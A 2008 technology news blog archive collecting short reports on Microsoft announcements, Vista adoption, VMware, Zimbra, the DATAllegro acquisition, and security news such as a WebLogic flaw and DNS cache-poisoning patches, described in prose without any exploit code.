Thursday, July 31, 2008

Microsoft Launches Free Collaboration Tools for Researchers

This week, during a summit of researchers in Redmond, Microsoft announced a set of free software tools for helping researchers publish, preserve and share data.

The utilities include an authoring add-in for Word 2007 for capturing document metadata; a Creative Commons add-in for Office 2007; an e-journal service for self-publishing of online-only journals; a research output repository platform; and a collaborative workspace for researchers.

"Collecting and analyzing data, authoring, publishing, and preserving information are all essential components of the everyday work of researchers -- with collaboration and search and discovery at the heart of the entire process," said Tony Hey, corporate vice president of Microsoft's External Research Division. "We're supporting that scholarly communication lifecycle with free software tools to improve interoperability with existing tools used commonly by academics and scholars to better meet their research needs."

The Article Authoring Add-in for Word 2007 lets researchers capture metadata at the authoring stage to preserve document structure and semantic information throughout the publishing process. The Creative Commons Add-in for Office 2007 allows authors to embed Creative Commons licenses directly into an Office document (Word, Excel, or PowerPoint) by linking to the Creative Commons site via a Web service.

The Microsoft e-Journal Service provides a hosted platform for self-publishing of online-only journals to facilitate the availability of conference proceedings and small and medium-size journals.

The Research Output Repository Platform helps capture and leverage semantic relationships among academic objects -- such as papers, lectures, presentations and video -- to facilitate access to these items.

In partnership with the British Library, a workspace will be hosted on Microsoft Office SharePoint Server 2007, providing researchers a way to collaborate throughout a project's lifecycle, from seeking funding to searching and collecting information, as well as managing data, papers and other research objects throughout the research process.

Microsoft partnered with researchers on the development of the tools to meet academic community needs. The company's product groups also submitted feedback on how the Microsoft technologies could optimally address the entire research process.

AT&T Says Fie on Free Fi for iPhone (Again)
Microsoft Opens Up Office to New Document Formats
EU to probe Microsoft’s ODF move

WebLogic Security Hole Found

A recently uncovered flaw with the Oracle WebLogic server allows users to gain entry to the software's server without a user name or password.

Oracle has posted instructions on configuring to software so that it will not be susceptible to an attack based on this flaw. The company will also release a patch to fix the problem.

Malicious code harnessing the flaw can "impact the availability, confidentiality or integrity of WebLogic Server applications which use the Apache Web server configured with the WebLogic plug-in for Apache," according to the Oracle advisory.

An exploit could be used to stage a denial-of-service attack on the machine, or even be used to gain entry to that system. Versions 10.3 and earlier of Oracle WebLogic Server (formerly called BEA WebLogic Server) are susceptible to this exploit.

The vulnerability resides in a WebLogic plug-in module for the Apache Web server. It is a buffer overflow, meaning malicious users could append executable code onto the end of a bogus request for a Web page, one made up of an abnormally long string of characters.

The work-around consists of limiting the length of a Web address that can be submitted to the Apache Web server to 4,000 characters or less. This can be done either by adding a line to the Apache configuration file, or installing an Apache security module.

According to Oracle, code exploiting this flaw was posted on the Internet without any prior notification to the company. Because Oracle did not have time to prepare a patch, it has issued an alert outside its routine quarterly patch cycle.

Oracle has rated the severity of this hole as high on the Common Vulnerability Scoring System. The National Vulnerability Database has assigned the vulnerability ID CVE-2008-3257 to this flaw.

Apple ships massive Mac OS X 10.4 security upgrade
Embedding Python In Apache2 With mod_python (Debian Etch)
Oracle Releases Critical Updates

Microsoft Mum After Midori OS Plan Leaked

Microsoft is working on a project to develop a new operating system, code-named "Midori," but the company won't disclose the details at this time. The Midori OS will be a non-Windows solution, unlike Microsoft's "Windows 7" code-named OS currently in development, which will largely use the Vista OS kernel.

An SD Times article on Tuesday provided a description of the Midori project based on leaked "internal Microsoft documents." However, the first indications of the project's existence may have been publicized by Mary Jo Foley in her All About Microsoft blog.

A Microsoft spokesperson wouldn't comment on the SD Times article, but did confirm that the Midori project exists.

"We can confirm that Midori is one of many incubations projects underway at Microsoft, as such we are not talking about it at this time," the spokesperson stated in an e-mail. "Microsoft is always thinking about and exploring innovative ways for people to use technology."

An incubation project means that the project is "closer to market than most Microsoft Research projects, but not yet close enough to be available in any kind of early preview form," according to Foley in her "Microsoft 2.0" book.

Midori will be designed to avoid some of the dependency problems associated with Microsoft's older software technology. It will be "componentized," "Internet-centric" and based on a world of "connected systems," According to the SD Times article.

Foley says that the Midori project is led by Eric Ruder, Microsoft's senior vice president for technical strategy, whom Foley described as a "Gates heir-apparent." Ruder also oversees Microsoft's Singularity research project, an OS with some similarities to Midori, according to Microsoft's description of it.

For instance, Singularity focuses on a kind of componentization called "software isolated processes," or SIPs, which "provide the strong isolation guarantees of OS processes (isolated object space, separate GCs, separate runtimes) without the overhead of hardware-enforced protection domains," according to an overview at Microsoft Research Web site.

Midori's componentization may be designed to handle the problems of bloat that have come with Windows OS evolution over time. The SD Times article describes Midori's componentization as boosting both security and performance.

"It [Midori] will have strong isolation boundaries and enforced contracts between components, to ensure that servicing one component will not cause others to fail, while keeping overhead minimal."

Midori will also support "distributed concurrency -- or cloud computing -- where applications components exist in data centers," according to the SD Times article. The concurrency will be in effect "both for distributed applications and local ones," the article explains.

The concurrency concept sounds a lot like the data-handling capabilities of Microsoft's Live Mesh solution, a cloud-computing solution unveiled in April that promises to enable data connectivity and synchronization across various devices regardless of the location of that data.

The whole cloud computing concept is being heavily promoted by Microsoft, including Chief Architect Ray Ozzie. It's part of Microsoft's software plus services approach, in which software will be either installed at the customer's premises or hosted on external servers and accessed over the Internet.

Live Mesh Preview: It’s Wait-List Only
Run Linux in Windows
Cloud Computing To Bring Security App Shift, Report Says

Wednesday, July 30, 2008

The Mojave Experiment: A Vista Love Fest

Microsoft today announced the results of its Mojave Experiment survey, which gauged user reactions to Windows Vista in a supposed blind trial using hidden cameras. The trial polled 120 users in the San Francisco area who had an initial "unfavorable" view of Vista.

Unfavorable meant giving Vista an initial average rating before the experiment of 4.4 points out of 10 total points.

During the experiment, participants tried out a so-called "Mojave" operating system, which was really Vista without the identifying logos. Of 120 participants in the experiment, the average user rating of Vista was 8.5 positive after trying the OS out, according to Microsoft.

Most of the Mojave Experiment participants were Windows XP users (84 percent), with some Apple OS (22 percent) and other OS users in the mix. The trial was administered by a "trained retail salesperson," according to Microsoft's Chris Flores.

The existence of the Mojave Experiment was unveiled during Microsoft's Financial Analyst Meeting on July 24. Analysts at the event saw a video presentation of the Mojave Experiment's findings but it was blacked to those listening online. Microsoft now provides a Mojave Experiment public site to view the survey results as part of an overall marketing presentation promoting Vista.

Microsoft has sold around 180 million Vista licenses since the operating system launched, which is "very balanced across both consumer and enterprise," said Bill Veghte, senior vice president of Microsoft's Online Services & Windows Business Group, speaking to the Financial Analyst Meeting crowd.

The Mojave Experiment addressed consumer interest in Vista. At the enterprise level, the numbers are clear. Vista adoption in the enterprise has barely edged up over the year or more of its existence. Vista adoption in the enterprise still remains in the single digits, according to a recently published Forrester Research study.

Microsoft's Flores attacked the author of that study, Thomas Mendel, for saying that Vista had been "rejected" in the enterprise. Flores said that Forrester was "schizophrenic on Windows Vista," citing a more positive study written by Forrester analyst Ben Gray.

For its part, Microsoft plans to address Vista's "bad image," often attributed to negative press accounts.

Microsoft's Corporate Vice President Brad Brooks told the partner crowd attending the company's Worldwide Partner Conference earlier this month that Microsoft planned to defend Vista against its critics. The company also plans to invest more funds into Vista marketing to combat Apple's ads, with about $300 million being the estimated budget.

The Mojave Project is not part of that new spending plan, according to veteran Microsoft watcher, Mary Jo Foley.

Microsoft's reactions may seem a little like overkill. Its Windows operating systems accounted for 91 percent of all operating systems used in 2008, down from about 93 percent in 2007, according to Net Applications' Market Share report.

The next runner up, Apple, had an OS share of almost eight percent, up from a little more than six percent in 2007, according to the report.

Enterprise Adoption of Vista at ‘Single Digits,’ Report Says
Forrester: Vista rejected like ‘new Coke’ by enterprises
Run Linux in Windows

Small Companies Lax About Computer Security, Report Finds

Large companies are valuable targets for cyber criminals, but what about the small fry? Software security firm McAfee took a gauge of opinions, finding that some small and medium-size businesses don't seem that concerned about potential hacks. At least that's what its recent survey suggested.

The results were collected from telephone interviews of officials at small companies, which were defined as having less than 1,000 employees. McAfee surveyed at least 500 respondents at U.S. and Canadian firms.

The report said that 45 percent of those surveyed didn't think their enterprise environment was threatened by cybercriminals. What's more, at least 250 of the IT pros who picked up the horn and answered McAfee's survey questions believed their company didn't have the big brand name to attract hackers.

"For businesses of all sizes, viruses, hacker intrusions, spyware and spam can lead to lost or stolen data, computer downtime, decreased productivity, compliance issues, lost sales and even loss of reputation," stated Darrell Rodenbaugh, senior vice president of the mid-market segment at McAfee in a press release accompanying the report. "Just because a business is small does not mean it is immune to security threats."

The report added that 35 percent of respondents weren't even concerned about attacks, but about 34 percent said they'd been attacked at least four times in the past three years.

Defining Security
Every other week, month or quarter, the reports pile up, chronicling inside jobs, the proliferation of malware and a general apathy among many IT managers and staffers toward computer security. Critics of such reports might say that they come from vested interests that just publish alarming numbers to sell security solutions.

Not so, says Christian Phillips, head of security for the Regulus Group, a remittance and general business-process outsourcing company for several Fortune 500 companies. He added that many of these studies have demonstrated a noticeable pattern.

"Security is job one when you're defining a business strategy," Phillips said. "It's not just a reactionary tactic or something to get proactive about when there are threats, but a necessity."

When a peer company is attacked, it's an "issue." However, when your enterprise is attacked, it's a "problem," security experts say.

Threats of All Kinds
New threats emerge every day. Just last week, commercial air carriers Delta and Northwest warned customers about bogus e-mails posing as airline ticket invoices, which might contain malicious code, spyware and malware. The airline urged potential customers and anyone getting such spam to delete the messages without opening them.

Craig Schmugar, a researcher at McAfee, confirmed the threat in the software company's blog. The e-mails are said to look like authentic correspondence from the airlines and even provide a screen that looks like a log-in interface asking for a username and password. The message typically says that the user's credit card has been charged by an amount, usually in the $400 range. There is even an attachment claiming to be the invoice for the ticket and credit card charge.

With larger DNS threats in the offing, taking control of security measures makes sense, according to Andrew Storms, director of security at San Francisco-based nCircle.

"For those of us who breathe infosec everyday, it's a no brainer to devote resources into the remediation and risk reduction strategies surrounding threats," Storms said. "And it should be a no brainer to people in IT circles everywhere and outside of IT at the executive level."

If you have a computer and it processes critical information, "secure your network, period," Storms added.

Cloud Computing To Bring Security App Shift, Report Says
PC Tools launch iAntiVirus beta

Tuesday, July 29, 2008

Microsoft Joins Apache Software Foundation

Microsoft inched closer to open source with a couple of announcements made last week at the OSCON open source conference in Portland, Ore.

The company will become a platinum sponsor of the Apache Software Foundation and is contributing a patch to help PHP code work better with Microsoft SQL Server. The news was announced on Friday by Sam Ramji, Microsoft's senior director of platform strategy.

As a platinum sponsor to the Apache Software Foundation, Microsoft will pay "administrators and other support staff so that ASF developers can focus on writing great software," Ramji said in his blog. Platinum sponsors contribute $100,000 per year, according to the Apache Software Foundation's Web site.

The announcement adds to Microsoft's efforts to collaborate with open source, especially when it enables interoperability with some open source solutions. For instance, in March, Microsoft announced cooperation with the Apache Software Foundation by contributing code to the Apache POI project, which is an effort to create Java libraries supporting Microsoft Office document formats.

Ramji listed two other Apache projects in which Microsoft has participated, in addition to Apache POI. Those projects are Apache Axis2, which provides an interface for Web services, and Jakarta, which focuses on developing open source applications for Java platforms.

Microsoft also announced last week that it will provide code to support PHP data compatibility with Microsoft SQL Server. The company is providing a patch to a PHP data access layer called ADOdb to better enable interoperability. Ramji said the effort represented Microsoft's "first code contribution to PHP community projects but will not be last."

Microsoft has previously announced collaborative efforts with Zend Technologies, a contributor to the PHP scripting language and provider of an enterprise PHP framework and solutions. In March, Microsoft certified PHP for Windows Server 2008. The two companies have also worked together to optimize PHP for Microsoft Internet Information Services (IIS).

Ramji also pointed to a "clarification" of Microsoft's open specification promise (OSP), in which Microsoft opened protocols and documentation for some of its core products to developers.

The clarification seems to have originated based on Microsoft's work with Apache POI. Under the OSP, developers have "the right to intentionally subset, have partial implementations, or defects in implementation of these specifications," according to Ramji.

Ramji pointed to a comment by Microsoft's associate general counsel for intellectual property policy on the clarification.

Microsoft's OSP has previously been criticized by the Software Freedom Law Center as incompatible with the GNU General Public License, largely on the basis of being able to create new versions of software incorporating Microsoft's code.

Open source phone goes mass-market
Enemy Territory Quake Wars Live Weekend 2008
Open Source Needs Better Security Focus, Study Says

First Look: Zimbra Web-Based E-Mail for the Desktop

Zimbra, a Yahoo-owned company, last week released a beta of the open source Zimbra Desktop solution, which is meant to be an alternative to more traditional e-mail/groupware applications such as Microsoft Outlook.

In keeping with its Yahoo roots, Zimbra Desktop offers extensive integration with Yahoo's tools and e-mail, plus Yahoo branding throughout the user interface. The program itself has a very Web-like interface, with clean organization and a convenient tabbed toolbar at the top. The toolbar offers features such as e-mail, contacts, calendar, a to-do list, briefcase and documents.

I have a Google Mail account, so I was eager to see how well it integrated with Zimbra Desktop. After providing the login information for my account and configuring it to work with IMAP, I was pleased to see that Zimbra Desktop loaded my e-mail in-box properly. However, Zimbra Desktop does not provide access to Google Talk, which uses a standard Jabber protocol supported by many third-party chat applications. Moreover, the program did not automatically import my rather lengthy Gmail contact list. However, there's a workaround, as contacts may be imported from CSV files.

Zimbra Desktop is fairly configurable. It allows the user to define signatures, default font options for messages and provides the ability to display e-mail as HTML.

Users can filter spam in Zimbra Desktop by defining actions based on keywords, such as deleting messages containing a certain words. However, I was disappointed to see that there was no way to integrate more powerful Bayesian filters, such as the popular open source SpamAssassin tool -- something needed in today's spam-plagued world.

Zimbra efficiently uses the desktop space. For instance, the main window of the program can be closed completely and the program will still keep a daemon running in the background, thereby freeing up precious taskbar space. This daemon is also able to pop up a notification message when new mail arrives.

Zimbra Desktop is built on the Mozilla Prism platform, which allows Web applications to be packaged in an executable wrapper powered by Firefox. This frees Web applications from the standard browser interface to make them truly stand-alone apps.

The memory usage of Zimbra Desktop (prism.exe) averaged 40 MB during my test, which is fully acceptable for modern applications on today's powerful desktop systems. I noticed that it took seven to nine seconds for Zimbra Desktop to fully start up (without the daemon running) and load my in-box. In contrast, Gmail's Web interface took about half as long (three to five seconds) on several tests. While the slightly slower speed not a serious problem, it would help if the program's speed could be increased, since there is also some delay between switching between tabs in the interface.

If this speed issue can be resolved and a few more features added, the program will be very promising in the final release. The beta for Linux, Mac and Windows can be accessed here.

.Mac mail to to be push-ready on iPhone 2.0?
Microsoft Warns of ActiveX Exploit in Access
Microsoft Warns on Safari ‘Carpet Bombing’ Flaw

Analysis: Behind Microsoft's DATAllegro Acquisition

You've already snapped up Microsoft-branded mice, keyboards and gaming consoles. Is a Microsoft data warehouse (DW) appliance in your future?

That's just one question triggered by Microsoft Corp.'s acquisition on Thursday of DW appliance stalwart DATAllegro Corp.

Just why Redmond grabbed DATAllegro is a matter of some debate. DATAllegro, like DW appliance pioneer Netezza Inc., was among the first wave of vendors to champion the turnkey DW appliance model. In addition, DATAllegro was arguably the first appliance player to shift production to all-commodity hardware from OEMs such as Dell Computer Corp., Cisco Systems Inc. and EMC Corp. (Rival Netezza still uses "commodity" PowerPC chips in its appliance architecture.)

Since then, a raft of players -- InfoBright Corp., ParAccel Inc. and Vertica Inc., among start-ups; Hewlett-Packard Co., IBM Corp., Oracle Corp. and Sybase Inc. among established vendors -- have also taken the DW appliance plunge.

Perhaps the driver was that DATAllegro gives Microsoft a symmetrical counter to relational database rivals IBM and Oracle on the DW appliance tip. After all, Big Blue has been shipping its DB2-based Balanced Warehouses (nee, Balanced Configuration Units) for four years now, while Oracle -- after years of informally marketing "reference" warehouse configurations that it developed in tandem with hardware partners such as HP and Sun Microsystems Inc. -- announced its first explicit DW appliance program, the Oracle Optimized Warehouse, last September. Perhaps the Redmond giant perceived a DW appliance gap: It could counter IBM's and Oracle's efforts in the data warehousing low-end (the sub- or single-TB range) but was running out of gas in the DW high-end.

DATAllegro CEO Stuart Frost, for his part, said that's precisely it. "[DATAllegro] is fundamentally a high-end play. It's fairly common knowledge that Microsoft's share of the market above 10 TB is much smaller than their share below that level," he said, stressing that "SQL Server has certainly improved greatly since SQL Server 2000, and SQL Server 2008 is a great SMP product. But that's all it is: SMP. Clearly we take [SMP] in a whole new dimension of scale-out."

Frost noted the companies' history of partnership: Redmond first approached DATAllegro with the suggestion that the two companies join forces to deliver an accelerated version of SQL Server. In the midst of that, Frost said, Microsoft and DATAllegro shifted gears, talking up a plan to develop reference architectures -- just as Oracle did with its OOW push -- for SQL Server in certain hardware configurations. Buy-out talks followed, he noted.

"Reference architectures are the way major vendors have co-opted the appliance story. A big part of why [Microsoft] bought us is that we have the expertise and the ability to take that [reference architecture] to a whole new level and leapfrog Oracle in [terms of] getting that reference architecture right," Frost said.

Were scalability and reference architectures the prime drivers? No one knows for sure -- but analysts are speculating. Consider veteran data warehouse architect Mark Madsen, a principal with consultancy Third Nature Inc. and author of several data warehousing books, who thinks the DATAllegro deal does, in fact, boil down to an issue of high-end scalability. DATAllegro, with its homegrown DW technology, had it. Microsoft, with its credible -- but, compared to offerings from Oracle and IBM, immature -- SQL Server database, didn't.

"It's the missing high-end scalability for SQL Server. [Microsoft] had nothing to compete with Oracle or IBM. Now they do," Madsen said. He also noted that Microsoft should have the goods to compete with Oracle and IBM "in three years, when the next rev of SQL Server comes out."

The good news, from Microsoft's perspective, is that DATAllegro -- unlike competitor Netezza, for example -- isn't tied to any specific hardware platform. It does depend on some special driver configurations, Madsen conceded, but not extensively. Furthermore, driver dependencies probably aren't anything that would prevent Microsoft from pushing its SQL Server-derived DATAllegro technology on to any of its existing partner platforms.

As for Madsen's timetable, Frost is far more sanguine. "It's not going to take years, as some people in the blogosphere are predicting," he said. "Just from [the integration work] we've already done, we've actually found that it's going to be pretty straightforward. All of the hooks are there already [such as] the APIs. We don't have to change a line of code in SQL Server."

He continued, "Yes, we'll have to change some of our query optimizations to make it run better with SQL Server. In most cases, however, it's that much easier [than working with Ingres]. SQL Server is just that much more sophisticated, [so things such as] join capabilities, I/O -- basically all of those things that we used to have to work around in Ingres -- we can just pass a lot of that through to SQL Server without optimizing it."

The more vexing question involves DATAllegro's software special sauce, which is based on Ingres and Linux, two technologies that are largely unpalatable -- if not anathema -- to Microsoft. "DATAllegro's code is on Ingres and Linux, but as I understand...[it], it's more layered on top than hooked deep inside like [rival appliance architectures such as] Greenplum or Netezza," Madsen said. "It certainly doesn't run on Windows or C#/.NET or on SQL Server."

That's true, too, Frost conceded, but DATAllegro is really more of an architectural vision that doesn't depend on any particular technology prescription. For this reason, he argued, the move from Ingres and Linux to SQL Server and Windows -- while far from non-trivial -- shouldn't be a showstopper.

"We took some decisions very early on, knowing that in such a large market dominated by an incumbent, [that our] most likely exit was going to be [by way of] an acquisition. So, for example, all of the communication between our end nodes [which take in data] is through standard SQL, so pretty much any database will speak the ANSI SQL that we use at that level. We do have some mechanisms to do sideways movements of data, but we've found that SQL Server with its APIs will allow us to port over pretty easily what we already have," he said.

Why Now?
As for the timing of the acquisition, Madsen, like other industry watchers, is flat-out flummoxed.

For one thing, he pointed out, DATAllegro recently closed the books on another round of venture capital (VC) funding, which likely boosted the price that Redmond had to pay for it. He stressed that the DW appliance segment is teeming. It's flush with vendors, ideas and -- to a degree -- with VC seed money.

That's bound to change: The market itself will contract, a natural culling will occur and VC funds will flow to vendors that have the best shot at making it. Why didn't Microsoft wait for this to happen, Madsen wondered. Why did it overpay now for what it possibly could have had -- six months from now, a year from now or 18 months out -- at a cheaper price? Madsen, like several other industry watchers with whom we spoke, doesn't know. "It's very not-Microsoft, so I don't get that part of it," he confessed.

There's another wrinkle here, too: Is a Microsoft-branded DW appliance in the works? Microsoft's past forays into hardware have been niche-y and limited -- largely to avoid upsetting its Wintel OEMs. The company has had considerable success with Microsoft-branded mice, keyboards and other accessories, for example. Does it have any real interest in marketing full-blown DW appliances, or is it just acquiring DATAllegro for its technology? Does it, in fact, plan to stop selling DATAllegro- or Microsoft-branded DW hardware?

Frost, with the obvious disclaimer that he isn't yet speaking for Microsoft, said yes. He explained that the DATAllegro buy signals a shift away from fixed-configuration appliances to reference architectures (similar to what Oracle is doing with its OOW initiative) -- a data warehouse vendor works with many hardware partners to build, test, optimize and certify its offerings in specific hardware configurations. To a degree, he suggested, that's where the appliance market itself is heading: Not just Oracle, but Sybase -- with its IBM System p-powered Analytic Appliance -- is another example in kind.

"The answer, really, is yes. It's pretty obvious, frankly. It makes a great deal of sense. Microsoft is not in the business of selling big iron. This is a lot of hardware, so why not partner with the existing vendors to deliver it?" he said.

Sentrigo Offers Help for Database Patching Woes
Oracle Releases Critical Updates
RHSA-2008:0575-01 Moderate: rdesktop security update

Sunday, July 27, 2008

Microsoft's DNS Fix Leads to More Problems

The blogosphere is awash with talk about the possible overall weakness of the Domain Name System (DNS) architecture. For its part, Microsoft's released a DNS fix in its patch slate for July, but Redmond seems to have problems just getting it to end users. Moreover, some users of the DNS fix have experienced additional difficulties.

So far, since Microsoft's DNS fix was issued on July 10, there have been two separate problems associated with its installation.

The software giant disclosed last week, in a technical posting on its SBS services blog, that some users experienced interruptions in the Exchange Server services component of application stacks sitting on various Windows operating systems.

"Some customers have reported seeing random problems with services after installing MS08-037," the blog stated. MS08-037 is Microsoft's fix designed to stave off DNS cache exploits. Hackers can use this vulnerability to increase their chances of redirecting an unsuspecting user to a malicious Web site.

The blog indicated that notifications for Active Sync -- Microsoft's solution for synchronizing a mobile device with either a PC or server hardware running Exchange -- were failing. Also, Internet Protocol Security (IPsec) services and Internet Authentication Services (IAS) were failing to start.

Reached early Tuesday for comment, Microsoft would only confirm that this issue is separate from another glitch announced on July 10 -- an interoperability snafu associated with the ZoneAlarm security application made by Check Point Software Technologies. In response to the glitch, Check Point provided updates for all of its ZoneAlarm products.

Tyler Reguly, a security engineer for San Francisco-based nCircle, commented that Microsoft should be more transparent about issues like those outlined in the SBS services blog. Such descriptions went relatively under the radar, and could be considered highly technical, bordering on vague.

"It may take users quite a while to diagnose the problem and then they have to find this specific blog post," he said. "Microsoft should really be doing more to make people aware of the issue. The impact isn't as great as the recent WSUS issue, but this should be handled in the same way that was. It should be given its own KB number and a security advisory should be released, especially given that IPsec is potentially affected."

Apple posts Apple TV 2.1, iPhone Web Config updates
Apple fixes Safari ‘carpet bomb’ bug
Windows DNS Patch Strands ZoneAlarm Users

VMware To Give Away Hypervisor

VMware has launched its first counter-attack to Microsoft's pricing structure for its virtualization products, announcing that ESXi, its lightweight hypervisor, is going to be given away for free.

The announcement came from new president and CEO Paul Maritz, who took the reigns from dismissed co-founder Diane Greene on July 8. Maritz made the remarks during VMware's second quarter earnings call on Tuesday afternoon.

VMware CFO Mark Peek delivered the bulk of the bad news, stating that VMware will make substantially less money than expected this year. The company originally expected a year-over-year growth rate of 50 percent; that number was revised down sharply, to between 42 - 45 percent.

Peek chalked most of that poor performance up to a tanking of revenue generated by enterprise licensing agreements (ELA). He said that many customers are "forgoing discounts [gained through ELAs] to meet shorter-term needs." He also said that Microsoft's entry into the enterprise virtualization market is likely having an effect, as potential customers are slowing down their rush to buy VMware products, and considering Microsoft's new offerings, like the free Hyper-V.

Maritz gave a brief nod to Greene's leadership of the company, then launched into his take on where VMware is headed. He said it's in its "third stage" of growth. The first was the introduction of the hypervisor. The second was the introduction of virtual infrastructure products and expansion of their use in business.

"Stage three", Maritz continued, "is about dramatically extending the virtual infrastructure and products for more uses and to more users."

One way to do that is to give away the hypervisor, which other vendors already do. Currently, ESXi costs about $500, and ESX, the primary hypervisor, is substantially more than that, depending on the configuration. ESXi's small size (32MB) makes it embeddable, and VMware has a number of deals in place with OEMs like Dell, HP, IBM and others to ship it on servers. Starting July 28, ESXi will cost nothing.

The other way to increase profits is to cut costs. To that end, Maritz said a hiring freeze will go into effect, "except for strategic positions." He didn't elaborate on those statements, or mention if layoffs might be coming.

Senior Director of Product Marketing Bogomil Balkansky said that the price for ESX will not be reduced, but that it shouldn't matter to customers, because ESXi is the future. "We've made it clear that our future architectural direction is ESXi," Balkansky said, adding that both products are "completely functionally equivalent." The price of VI, VMware's suite of infrastructure products, will not change, he said.

Balkansky denied that making ESXi free was a direct response to Microsoft. "There's an inclination to interpret it that way, but I think this is a very logical move for us, given that we have a tried and true record" of making products free after a time. For instance, GSX Server (renamed VMware Server) was made free in 2006. "The timing has more to do with product release schedules and priorities, rather than what a competitor may be doing," he said.

Still, Balkansky added, there is "no question that making it free gives us an advantage and levels the playing field."

Maritz also mentioned several other new areas in which VMware will be aggressive, including extending its reach more strongly into the Asia Pacific region, and becoming more active in "the cloud", which means accessing resources over the Internet. That, perhaps, isn't surprising, since Maritz' former company, Pi Computing, was cloud-focused. Pi was bought by EMC last February. VMware, Maritz said, will "have a lot of relevance in the cloud, and as an on-ramp into the clouds."

Greene Out at VMware
Most returned products work fine, study says
Hyper-V Made Available
Yahoo: Burn your DRMed tracks to CD now

Saturday, July 26, 2008

DNS Problem Is 'Important' To Patch, Microsoft Says

Microsoft issued a formal security advisory on Friday addressing what IT security pros are calling an "urgent warning" to patch a general Domain Name System (DNS) vulnerability that can enable spoofing attacks. Redmond recommends installing a previously released "important" DNS patch as soon as possible.

The advisory comes almost immediately after H.D. Moore, a hacker and researcher who created the Metasploit vulnerability testing framework, published the attack code in two parts on Wednesday and late Thursday. The code was posted at several security mailing lists and at the Computer Academic Underground Web site.

According to the summary of the exploits, the first one enables a hacker to corrupt the cache in a DNS server. The other exploit is multifaceted and rotates, giving the attacker a shot at a larger amount of domain names through a single entry. Experts say the latter exploit could result in thousands of fake addresses inserted into a DNS server's cache.

In its latest bulletin, Microsoft noted that "attacks are likely imminent" because of the availability of exploit code.

"Since the coordinated release of these updates, the threat to DNS systems has increased due to a greater public understanding of the attacks, as well as detailed exploit code being published on the Internet," the advisory stated.

Reacting to the advisory, IT security pros are saying that Microsoft's statements vindicate the assertions of critics who thought the risk considerations regarding the DNS patch were underplayed.

"While Microsoft admits no active attacks on their radar, and they labeled the patch as 'important,' they are also subtlety saying that everyone needs to patch now because the risk is pretty large," said Andrew Storms, director of security for San Francisco-based nCircle, in an interview with on Friday.

IT security pros do admit that the DNS discourse and subsequent exploit release spiraled faster and further than Microsoft could have anticipated.

"The magnitude of the big-picture problem is probably more clear now than when Microsoft released the patch, especially now that exploit code is out and has the capability of significant disruption of all DNS-dependent network activity," said Don Leatham, director of solutions and strategy at Lumension Security in Scottsdale, Ariz.

Leatham suggested scrutiny of the fine print in Microsoft's latest DNS security bulletin.

"We've not seen an inordinate number of inquires on the installation issues. However people should pay special attention to the FAQ for this bulletin, as it has been updated multiple times as issues have been discovered."

While Microsoft touts its DNS vulnerability patch as a safe haven, there are still some issues with actually getting it installed in some Windows programs.

GLSA 200805-17 Perl: Execution of arbitrary code
Word 2002 SP3 Subject to Remote Attacks
Microsoft Advisory Targets SQL Injection Attacks

Ballmer and Liddell Defend Microsoft's Online Spending Plans

Microsoft held its 2008 Financial Analyst Meeting on Thursday, with 10 senior executives attempting to assure the number-crunching crowd on the company's overall financial outlook. The meeting follows Microsoft's 2008 fiscal year-end report, in which revenues hit the $60 billion mark.

During the event, Microsoft's CEO Steve Ballmer filled in for Kevin Johnson, whose departure as head of the Platforms & Services Division was announced on Wednesday, along with a Microsoft division restructuring effort.

Ballmer provided a rationale for all of the spending going on in Microsoft's Online Services Business segment. He said the spending can address a market potentially worth a "trillion dollars."

"That's such a big opportunity that at least at our scale, our size, our market cap, we have to seize and go after those opportunities," Ballmer explained.

He added that Microsoft can build from its present online products (search, Windows Live and MSN) and that Microsoft has already become the 10th largest seller of advertising in the United States. Moreover, search represents a kind of "killer app" and entry point for Microsoft's online strategy. Ballmer dismissed the No. 2 search firm Yahoo, which currently leads Microsoft in search use, saying, "this is a two-horse race: Microsoft against Google."

Ballmer suggested just how much Microsoft may be willing to spend to contest Google in the search-ad space. He said that "Google spends about $2.5 billion and growing on R&D." In response, Microsoft might consider a range of "at least $1.2 billion or $1.5 billion a year to stay competitive."

Ballmer also gave a bow to Apple's recent inroads into the Windows-based PC market share. He said that Microsoft planned to offer products that offer "every choice that you can get on a Mac or other machine."

Chris Liddell, Microsoft's chief financial officer, assured the crowd that Microsoft's core business revenues have been flat over a five-year period, showing a 61 percent margin in fiscal-year 2008, which Liddell called "a tremendous performance." In contrast, the loss for Microsoft's Online Services Business segment, which drives Microsoft's search and online strategies, was 38 percent in fiscal-year 2008.

Liddell said that figure will "not always be negative" and that the Online Business Services spending is part of the company's efforts to generate future revenues.

The potential Yahoo acquisition, which was publicly proposed in January but technically called off in April, would have accelerated Microsoft's strategy in the online search-advertising space. However, Liddell claimed that the value of that deal had declined over time after Yahoo spurned Microsoft's unsolicited bid.

"We took the view, and still take the view, that Yahoo is a declining asset," Liddell said. He added that it is ironic now that Yahoo is willing to sell to Microsoft at the price Microsoft originally offered. He didn't rule out the possibility that Microsoft might still strike a deal to buy Yahoo's search-ad business.

Microsoft Revamps Its Platforms Division, Loses Kevin Johnson
Google search share climbs

Enterprise Adoption of Vista at 'Single Digits,' Report Says

The Windows Vista operating system has been "rejected," or is not widely adopted in the enterprise segment, according to a Forrester Research report released on Wednesday that describes enterprise software adoption trends for the desktop.

The study surveyed large enterprises throughout the first half of 2008. It found Vista adoption in the enterprise to be 8.8 percent in June, up from 6.2 percent at the beginning of the year.

The report, "Enterprise Trends: Vista Is Rejected; Mozilla and Apple Make Small Gains," was written with the aim of giving software vendors an idea on what to expect as they develop their products for desktop use.

By no means is Windows out of the picture, especially with wide use of Microsoft's legacy Windows XP operating system in the enterprise. The report recommends that vendors "develop exclusively for Windows XP and Vista," which account for the vast majority of operating systems used.

In addition, the authors recommend that software vendors "forget about Macs" unless they are developing solutions for specific enterprise markets that utilize Macintosh computers.

Linux desktop use in the enterprise was negligible, at less than one percent, according to the report.

For its part, Microsoft estimates that it has sold 180 million Vista licenses, as reported during its 2008 Financial Analyst Meeting, held on July 24. That 180-million figure is "very balanced across both consumer and enterprise," according to Bill Veghte, senior vice president of Microsoft's Online Services & Windows Business Group, who spoke at the event.

Veghte added that the adoption of Vista accelerated in the enterprise after Service Pack 1 was released. Microsoft released Vista SP1 to manufacturers in February of this year.

"You saw those enterprises accelerating that deployment," said Veghte to the financial analyst crowd, referring to Vista SP1. "And as one of you wrote on recently, we're seeing that track very consistently with the deployment cycle we saw in enterprises around XP."

The authors of Forrester's report had a different view.

"Eighteen months after the release of Windows Vista, enterprise adoption is still in the single digits, and the majority of that seems to have come from upgrades of legacy Windows versions, not XP," it stated.

